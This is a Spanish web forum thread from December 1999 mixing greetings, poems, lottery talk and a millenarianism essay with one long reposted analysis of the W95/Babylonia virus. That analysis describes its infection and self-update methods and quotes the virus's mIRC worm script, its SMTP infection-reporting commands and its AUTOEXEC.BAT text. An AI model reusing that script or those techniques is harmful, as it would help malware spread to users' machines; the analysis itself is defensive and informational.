| Ref: puesto el 22/12/99 0:00 |
| Buenas noches, Sigfrido.
:-{} ;-) |
| Ref: Sigfrido puesto el 22/12/99 0:14 |
| Por consideración. Buenas noches, literarios. |
| Ref: puesto el 22/12/99 0:14 |
| ;-) :-{} |
| Ref: yoi puesto el 22/12/99 0:16 |
| ¡¡ Buenas noches !!! |
| Ref: De Mackay a DAJO puesto el 22/12/99 0:21 |
| Enhorabuena (tú sabes por qué). Ahora que estoy estudiando la orientación de la LOGSE, comprendo mejor tu punto de vista. Y estoy de acuerdo. |
| Ref: Proxi puesto el 22/12/99 0:22 |
| Me alegro de poder leerte, Mackay |
| Ref: A Sigfrido puesto el 22/12/99 0:34 |
| Nas noches, guapísimo...¿Has comprado lotería para hoy?. La Voz anónima .-DD |
| Ref: puesto el 22/12/99 0:49 |
| Me parece que, por lo menos, aquí hay un dúo de voces:-DDD |
| Ref: De Mackay a Proxi puesto el 22/12/99 1:06 |
| Igualmente. Estamos demasiado perdidos de un tiempo a esta parte... Hasta pronto |
| Ref: Vividor puesto el 22/12/99 3:00 |
| Acaba de salir a la luz "Babylonia", el primer virus del mundo capaz de autoactualizarse por Internet por medio de "plug-ins". Un agente infeccioso que, por si lo anterior fuera poco, reúne las habilidades de un i-worm en cuanto a su distribución, de un virus en cuanto a la infección de ficheros, y de un troyano de "backdoor" en lo que a las mencionadas actualizaciones se refiere. El origen de "Babylonia", que ha causado multitud de infecciones en sus primeras horas de difusión por la red, se remonta al grupo de noticias "alt.crackers", cuando el 3 de diciembre fue enviado como fichero adjunto, bajo el nombre "serialz.hlp", en un mensaje con el que se ofrecía a los asiduos una recopilación de 17000 números de serie para registrar de manera ilegal multitud de aplicaciones para Windows de carácter comercial. Lo que en realidad sucede al abrir este fichero de ayuda es que el virus "Babylonia" es ejecutado, y así, éste procede a infectar los ficheros EXE de formato PE (Portable Executable) y HLP (archivos de ayuda de Windows), siempre que la plataforma en la que se estén llevando a cabo estas acciones sea Windows95 o 98, ya que, debido a que parte del código vírico corre bajo "ring-0" (el anillo de prioridad máxima de ejecución) por medio de llamadas a la función API indocumentada "VxDCall", este espécimen restringe su campo de acción dejando fuera a aquellas máquinas que corren con WindowsNT. El responsable de "Babylonia" es un conocido escritor de virus de origen brasileño apodado "Vecna", ex-miembro de grupos como SGWW, de la ex-Unión Soviética, y de los españoles 29A. Este programador, cuya producción para Windows es probablemente la más extensa de un creador de virus independiente, ya dio que hablar tiempo atrás con especímenes tan complejos como "Inca" o "Cocaine", que hoy en día siguen ocupando puestos de relativa significación en las listas oficiales de virus "in the wild". Instalación ----------- Tanto desde aplicaciones de formato PE como desde ficheros HLP, el primer paso del virus consiste en obtener la dirección real de las APIs necesarias para su correcta ejecución, momento a partir del cual "Babylonia" procede a saltar a ring-0 para así, por medio de la redirección de los servicios IFS (acceso a disco) dedicados a la apertura, lectura o modificación de atributos y renombramiento de ficheros, infectar tantas aplicaciones como sea posible. Durante el proceso de instalación en memoria, el virus comprueba la presencia de los monitores antivirus "Spider" (DrWeb) y "AVP" y, en caso de encontrarse activos, intenta parchearlos de manera que les resulte imposible abrir ficheros susceptibles de ser escaneados. De acuerdo con Eugene Kaspersky, debido a un "bug" el virus es incapaz de dejar al "AVP Monitor" fuera de combate, de manera que acaba por desechar la instalación de su código en memoria. De manera paralela, "Babylonia" descomprime, por medio del método "apLib", una aplicación adicional contenida en su código, de 4k de longitud en total, cuyo código inyecta en un nuevo fichero que el virus crea en el directorio raíz con el nombre "BABYLONIA.EXE". Y es precisamente aquí donde radica la mayor particularidad de este espécimen, ya que éste es el componente que permite la instalación de los "plug-ins" víricos. Cuando este portador es ejecutado, su funcionamiento consiste en autorregistrarse como un proceso oculto, copiarse a sí mismo como "KERNEL32.EXE" en el directorio de sistema de Windows, y asegurarse, por medio de la inserción del nombre de esta copia en el registro de configuraciones, de ejecutarse y así mantenerse residente en memoria en cada arranque del ordenador. Propagación ----------- Una vez que "Babylonia" ha "aterrizado" en un ordenador, vemos que su proceso de propagación sigue dos caminos: por un lado, el de la infección de ejecutables y ficheros de ayuda en modo local, y por otro, la difusión por medio de Internet como fichero adjunto a los mensajes salientes de una máquina infectada. La infección de ejecutables afecta a todos los ficheros de formato PE y extensión EXE que son accedidos por medio de las funciones IFS anteriormente enumeradas cuando "Babylonia" se encuentra residente en memoria. Tras una serie de comprobaciones a partir de los datos que se pueden encontrar en la cabecera PE tales como el procesador bajo el cual está diseñada para funcionar la aplicación "víctima" o la existencia de atributos de DLL, el virus determina si el fichero debe ser infectado o no. El método empleado es el del "entry-point obscuring" (EPO), mediante el cual se examina el código del archivo a infectar en busca de una instrucción "call", la cual es parcheada para llamar directamente al código vírico, en lugar de modificar el punto de entrada original de la aplicación. Tras esto, el cuerpo del virus es "colgado" de la última sección del fichero, salvo en caso de que exista una sección con relocaciones, la cual pasaría a ser directamente sobreescrita, evitando así el crecimiento en bytes del tamaño de las aplicaciones infectadas. Por su parte, la infección de ficheros de ayuda afecta a todos los archivos de extensión "HLP". El método de infección es muy similar al del virus "WinHLP.Demo": por medio de un script polimórfico que el virus inserta en la sección "SYSTEM" y del uso indocumentado de la API "EnumWindows", "Babylonia" consigue que su código binario se ejecute cada vez que un fichero de ayuda es abierto a partir de la "aplicación madre" encargada de dicha tarea, "WINHELP.EXE". Ya por último, la propagación por e-mail presenta pocas novedades con respecto a la que ya hemos visto "gracias" a otros i-worms en este mismo servicio de noticias. Así, la misión del virus consiste en localizar el módulo "WSOCK32.DLL" y de parchear la API "send", con el objetivo de monitorizar todo lo que el usuario envía en sus conexiones a Internet. Cuando se trata de un e-mail, a diferencia de otros i-worms, "Babylonia" se limita a adjuntar simplemente una copia de su código, independientemente de si el mensaje saliente ya lleva originalmente algún "attach". Por si esto fuera poco, y con el fin de asegurarse la compatibilidad con cualquier cliente de correo, el virus dispone de sus propias rutinas de codificación para formato UUencode y MIME, una característica sin precedentes en los i-worms que conocemos hasta el momento. El nombre y el icono de los ficheros añadidos por "Babylonia" a los e-mails enviados por el usuario deberían ser distintos dependiendo de la fecha interna de cada ordenador, y así, su autor preparó una serie de iconos y nombres de fichero en función de las distintas celebraciones o festividades que tienen lugar a lo largo del año, tales como Navidades, Pascua o Halloween. Sin embargo, y de acuerdo con Eugene Kaspersky, debido a un "bug" el nombre siempre resulta ser "X-MAS.EXE", y el icono, una cara sonriente de Papá Noël, de manera que la identificación del virus en el momento de su llegada a nuestro ordenador se simplifica al máximo. Una vez que el fichero portador del virus es ejecutado, y como ya es costumbre entre la inmensa mayoría de los i-worms conocidos hasta el momento, la atención del usuario es desviada por medio de un par de cuadros de diálogo que advierten de un error que en realidad no ha tenido lugar. En el caso de "Babylonia", los mensajes son éstos, donde la "xx" del segundo es "95" o "NT", optando siempre por la alternativa que sea distinta a la versión del sistema operativo que posea el usuario que acaba de ejecutar el i-worm: Loader Error API not found! Loader Error Windows xx required! This program will be terminated. Actualización ------------- Sin duda, el aspecto más interesante y más peligroso de este virus radica en su capacidad de actualizarse por medio de Internet. De este modo, su autor puede añadir, quitar o cambiar cualquier rutina o habilidad de su virus, de manera remota, y así hacer que todas las copias de éste se actualicen e incorporen nuevas tecnologías, que podrían incluír, entre otras, la destrucción de datos de un ordenador infectado, haciendo que "Babylonia" funcionase como un mero intérprete de las órdenes de su autor. La técnica consiste en monitorizar la presencia de la aplicación "RNAAPP.EXE", correspondiente al acceso telefónico a redes, de manera que el virus se asegura de que el usuario está a punto de iniciar una conexión a Internet. A partir de aquí, "Babylonia" se dispone a contactar con "sok4ever.zone.ne.jp/vecna", dirección de la que descarga el fichero "virus.txt", que contiene la relación de "plug-ins" que el autor ha ido añadiendo de manera periódica para su proyecto. De acuerdo con la información manejada por HispaSec, "SOK4EVER" es la continuación de "Sources Of Kaos", un servidor de hospedaje gratuito para páginas web con contenidos relacionados con el mundo de los virus informáticos, que fue eliminado por el FBI tras el revuelo causado por la aparición del virus "Melissa". Según acabamos de comprobar, el propio webmaster de "SOK4EVER" ha decidido dar de baja de manera fulminante la cuenta del escritor brasileño Vecna, al percatarse del uso que éste estaba haciendo de su servidor por medio de "Babylonia", de manera que cualquier opción de éste de seguir actualizándose queda descartada de modo tajante, al serle imposible de ahora en adelante dar con la cuenta de su autor, a partir de la cual obtenía los "plug-ins" necesarios. En cualquier caso, en el momento en el que el virus fue descubierto se localizaron cuatro "plug-ins" que con toda probabilidad habrán sido activados en la inmensa mayoría de las máquinas infectadas por "Babylonia". De acuerdo con lo que hemos podido comprobar, estos ficheros poseen un simple formato, compuesto por una cabecera de identificación ("VMOD", que significaría Virus/Vecna MODule) y una referencia a la dirección de inicio de la rutina principal del código a incorporar al virus. Veamos cuál es el cometido de cada uno de estos "plug-ins" que el autor ha conseguido "lanzar". DROPPER.DAT: se limita a comprobar si, aún estando el actualizador vírico activo, "Babylonia" no ha infectado todavía el sistema en que se está ejecutando. En caso afirmativo, el virus procede a correr una aplicación de 17k llamada "INSTALAR.EXE", que activa el virus y se borra a sí misma tras haber sido ejecutada. IRC-WORM.DAT: convierte el virus en un gusano de mIRC con aspecto de parche "Y2K", tras localizar el conocido cliente de IRC en el disco duro de la máquina remota e insertar el siguiente código, por medio del cual se envía a todos los usuarios de un canal en el que se encuentre un usuario infectado: [script] n0=run $mircdir2kBug-MircFix.EXE n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt } n2= /dcc send $nick $mircdir2kbugfix.ini n3= /dcc send $nick $mircdir2kBug-MircFix.EXE n4=} POLL.DAT: envía al autor del virus un e-mail, de manera que éste pueda efectuar un seguimiento de las infecciones que su virus va produciendo a lo largo de Internet. Los comandos enviados por el puerto 25 (SMTP) son los siguientes: HELO rasta.net MAIL FROM: babylonia@rasta.net RCPT TO: babylonia_counter@hotmail.com [...] El cuerpo de los mensajes contiene una frase en portugués: "Quando o mestre chegara?", que significa "¿Cuándo llegará el maestro?", lo que nos hace pensar que el autor se preparaba algún "payload" poco agradable para un futuro no muy lejano y que, por suerte, no llegará a verse consumado. GREETZ.DAT: se limita a modificar el fichero "AUTOEXEC.BAT" con una serie de agradecimientos del autor a otros componentes de la escena vírica, incluyendo al webmaster de "SOK4EVER", quien, como ya hemos comentado, ha dado de baja al autor de "Babylonia" de su servidor. El texto añadido es el siguiente: echo W95/Babylonia by Vecna (c) 1999 echo Greetz to RoadKil and VirusBuster echo Big thankz to sok4ever webmaster echo Abracos pra galera brazuca!!! echo --- echo Eu boto fogo na Babilonia! Consejos -------- Volvemos a remitirnos a las ya clásicas recomendaciones de no abrir o ejecutar ningun archivo que no hayamos solicitado, aún si éste proviniese de fuentes de confianza. Asimismo, recordamos que deben descargar los parches "Y2K" desde las webs corporativas, según su aplicación o sistema. Por último, y no menos importante, se aconseja actualizar los ficheros de firma de los antivirus, especialmente durante estos meses, ya que la llegada del nuevo año parece ser el origen de una ola de nuevos especímenes por lo señalado de la fecha, y para aprovechar la confusión que está provocando el efecto 2000. Desde HispaSec vamos a realizar un seguimiento especial durante estas fechas, del que tendrán cuenta en los próximos días. Instamos a todos nuestros lectores a hacernos partícipes de cualquier infección de la que puedan ser víctimas, y a formar parte activamente del equipo de emergencia que estamos desplegando. Más información: AVP-ES http://www.avp-es.com/noticias/babylonia.html AVP (Karspersky Lab) http://www.kasperskylab.ru/eng/news/press/991207.html Computer Associates http://www.cai.com/press/1999/12/ca_warns_new_class_virus.htm Network Associates http://vil.nai.com/vil/vm10461.asp Panda Software http://www.pandasoftware.es/vernoticia.asp?noticia=505&idioma=1 Sophos http://www.sophos.com/virusinfo/analyses/w95babylonia.html Symantec http://www.sarc.com/avcenter/venc/data/w95.babylonia.html Trend Micro http://www.antivirus.com/vinfo/security/sa120799.htm FELIZ NAVIDAD |
| Ref: puesto el 22/12/99 11:22 |
| Ref: puesto el 22/12/99 12:31 |
| ¿Estás? |
| Ref: puesto el 22/12/99 13:12 |
| El no, pero yo si |
| Ref: ¿eras tú? puesto el 22/12/99 13:13 |
| Debió creer que era imbécil, o un posible atacante, quizá solo miraba mi cara que la mira intentando decirme que deje de mirarla. Pero yo, hinotizado, y puede que anhelante, agoté los segundos hasta que el tren paró. La ví bajar despacio las sucias escaleras y por fin ocultarse entre mil otras caras. ¿Soñé que me miraba? ¿la ví que se volvió? ¿Fue aquello una sonrisa? O ¿fui tan solo yo? |
| Ref: ¿eras tú? puesto el 22/12/99 13:21 |
| Continúo el monográfico sobre relaciones personales, ya que tuve ayer la friolera de dos respuestas cuando ya había colgado. En resumen, las mujeres están dispuestas a establecer una conversación con un desconocido, aunque las circunstancias del encuentro no están claras. Si alguien se acercara y os dijera "Hola" "Hola, te conozco?""No, pero te estaba mirando y me apeteció hablarte, te importa?" ¿crees eso viable? |
| Ref: SOCRATES puesto el 22/12/99 14:30 |
| Estoy pletóooooorico de salud, no me duele naaaada, hay que ver lo que se disfruuuuuuuta estando bien... ¿ein? (nada...ni el gordote.... ni el segundo, coño el quinto cayó cerca, pero... na... cagontó... mañana a ver si la pedrea... "manque" sea p'al cava...) |
| Ref: Mileniarismo... ( I ) puesto el 22/12/99 14:59 |
| Desde mis modestas posibilidades, voy a tratar, estimados parquianos, de describir cómo se vió tan singular noche en Europa. En primer lugar, el mileniarismo es un movimiento que enfatiza la enseñanza de un milenio literal a partir de las descripciones aparecidas en el Apocalipsis. Diversos padres de la Iglesia fueron mileniaristas, si bien he de comentar que tanto la católica como las reformadas ( siglo XVI ) no aceptan la literalidad del milenio. Por el contrario encontramos movimientos como los Testigos de Jehová* y los Adventistas del Séptimo Día que utilizan el anuncio del fin del mundo en sus esfuerzos para intentar ganar adeptos. Los movimientos mileniaristas tienden a surgir en épocas marcadas por crisis sociales o convulsiones de cualquier índoleEstas doctrinas surgieron antes de la caída del Imperio Romano: los cristianos estaban temerosos de que la llegada del Mesías, su pasión y su muerte, no hubiesen sido útiles para traer el Reino de Dios a la Tierra. Como consecuencia, Cristo debía gobernar durante mil años antes de que el sueño de la llegada del paraíso se hiciese realidad. *Curiosidad: Los testigos de Jehová han profetizado, por boca de sus líderes como Russell y Rutherford, el final del mundo en los siguientes años: 1874, 1914, 1918, 1925, 15 de diciembre de 1941, y 1975. *** TIBERIO. Navidad de MCMXCIX *** |
| Ref: Para un Halcón Peregrino puesto el 22/12/99 16:01 |
| Ay amor, si supieras...! Empaño mis ojos en el empeño de amarte empeño por ser libre al besarte, por ser indulgente con mí delicado sueño de amor vigente, para el amor darte. Ay amor, si supieras...! Ciego miras mis ojos y no me ves. Abro mi corazón al viento, rescato mis principios para ofrecértelos. Redoblo mis promesas de quererte y te alejas como un barco ausente dejándome al amparo de mis silencios cuando sólo quiero seguir en ti, amarte Ay amor, si supieras...! Me duelen las palabras que callas, las miradas de enojo con que me regalas y solo mi corazón hieres con la desconfianza que muestras al hablarme. Ay amor...¿No te das cuenta? Las montañas me acompañan cuando estoy contigo. El viento se enfurece cuando a mi lado estás, porque me das la fuerza que necesito para seguir caminando sin mirar atrás. El mar se mantiene en mi alma esperando porque mi mar eres tu... La fuerza, el amor de tus brazos aquellos que un día elegí por ser mi luz Y me reprochas que calme mi alma, que la conciencia quede tal como debe estar nada es peor que el silencio en tus labios cuando el murmullo del río me quiere ahogar. Ay amor si supieras como te amo! Por las noches me arremolino en ti sabiendo que no serán mis manos las que te ayuden a dormir. Me aferro a la almohada suave pensando que tu cuerpo es, y cuando cierro mis ojos añorándote me digo: No es la almohada, es él. A veces miro la luna redonda y en ella leo tu rostro sonreír, y le digo a tus ojos serenos: Te amo, mi cara soñada, te amo como se ama el amor. Por ti daría mi alma, aunque no se darla sin dolor. Y la luna me mira envidiosa porque te digo palabras de amor en las noches en que tus oídos están lejos pero en las que yo añoro tu melodiosa voz. Y si supieras, mi amor más amado Las horas que cuento para volver a ti... Sabrías que lo único que realmente he añorado es el tiempo que me separa de ti. Una Orquídea recitando |
| Ref: / Socrates puesto el 22/12/99 16:30 |
| Si no quieres esperar a los periodicos de mañana para ver si te ha tocado alguna pedrea mira en www.el-mundo.es , podrás mirar tus numeros y te dice automaticamente si te ha tocado algo o no y cuanto te corresponde segun la cantidad jugada. a mi menda le han caido dos pedreillas, no esta mal jajajaja. Venga, que haya mucha salud para todosssssss ··Amara·· |
| Ref: ¡ FELIZ NAVIDAD! puesto el 22/12/99 16:32 |
| Nunca me ha gustado la Navidad. Son fechas en las que todo el mundo tiene la obligación de sentirse feliz y cordial...¡Eso debería ser todos los días del año!. Pero a pesar de todo, sigue siendo una buena excusa para que la familia se reúna, y para tener noticias de los amigos de los que hace tiempo no sabes nada. Este año no hay postal navideña, ni emilio con dibujos variados... Estoy vaga y encima, el ordenador no me va como debería, así que ni siquiera lo intentaré. Pero quiero desearos felices fiestas desde aquí, con la copa de Cava al aire, y brindar con vosotros, por todos y cada uno de nosotros ¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡SED FELICES!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! PD: JOS, te debo emilio ( A ti y a unos cuantos : -((( ). No me olvido, sólo necesito un poco de tiempo libre. Un beto, guapetón. PD2: No me ha tocado la lotería. PD3: Se os quiere a todos @@@Pálpito, adornando el cacharro (el día menos pensado lo quemo) @@@ |
| Ref: eh, tú puesto el 22/12/99 18:59 |
| parece mentira que aún no te hayas dado cuenta. Llevo horas mirando tu ventana. Sí, allí enfrente, antes desde la acera, ahora desde casa. ¿Qué pasa? ¿Es que no me necesitas? Por favor, contesta. Ahora. Por favor, ahora. |
| Ref: A eh tú puesto el 22/12/99 19:05 |
| Pues la verdad es que no te necesito |
| Ref: eh, tú puesto el 22/12/99 19:24 |
| ¿cómo lo sabes? ¿es que no necesitas a nadie? |
| Ref: Proxi al parque puesto el 22/12/99 19:25 |
| Buenas tardes Andan los informativos radiofónicos empeñados en transmitir la alegría de los nuevos ricos, sus risas y el descorchar de las botellas de champán. Otros le bailan el agua a un mafioso con la máxima de "show must go on" intentando que los clientes del tendero ladrón clamen para que siga metiendoles la mano en la cartera. Y están tan perdidos en ese bosque de pinos de decorado que les va a pasar inadvertido el verdadero acontecimiento de esta tarde. Hace una hora que ha salido la luna. Especialmente grande y brillante esta noche, los astronómos explican que es una rara conjunción de fenómenos. Pero es enorme y hermosa. Mis vecinos de la gran ciudad no la verán, envueltos como están en una niebla de puré de guisantes; yo les invito a mi casa y a mi chimenea, hacia el noroeste, por encima del Canto Hastial, la luna me lleva hasta tí. Proxi, abrigandose para salir al jardín |
| Ref: narrador puesto el 22/12/99 19:45 |
| Aprovechando que Proxi, en su serrano jardín, observa la ardiente luna, he entrado en su cuarto y he revuelto sus notas. Tal vez lo note, pero a su regreso me habré ido. ¿era él a quien busco? Escucharlo me calma, me relaja leerle. Será mi buen amigo, aún sin quererlo. |
| Ref: Al de las 13,12 puesto el 22/12/99 20:19 |
| Hay una gran diferencia entre él y tú, jamás podrás llegar ser como él. |
| Ref: darío puesto el 22/12/99 20:38 |
| Las noches se hacen cada vez más largas. El silencio se hace denso, no me atrevo a entrar en él. Esta noche dormiré en el pasillo, mágica estancia de espíritus errantes, estelas vagas que entran y salen sin detenerse siquiera un momento. Desde allí espiaré vuestro sueño, velando a unos y otras. Y, sin percibirlo yo mismo, iré absorbiendo vuestras inquietudes. Mañana os levantaréislibres de este peso que os lastra, que os impide levantar el vuelo. Arriba, todos, que nada importa ya. Sed finalmente quienes sois. |
| Ref: a 20:19 puesto el 22/12/99 20:44 |
| Afortunadamente , clarividente |
| Ref: Proxi a... puesto el 22/12/99 22:38 |
| Las notas revualtas no modifican un ápice la entropía de mi espacio. El caos es acogedor |
| Ref: puesto el 22/12/99 23:01 |
| Clarividenta, no te equivoques de sexo |
| Ref: puesto el 22/12/99 23:03 |
| Las mujeres vemos mejor las cosas, ya sabes nuestra sensibilidad etc, y tu forma de ser ya es más que conocida en el chat, ya no engáñas a nadie. |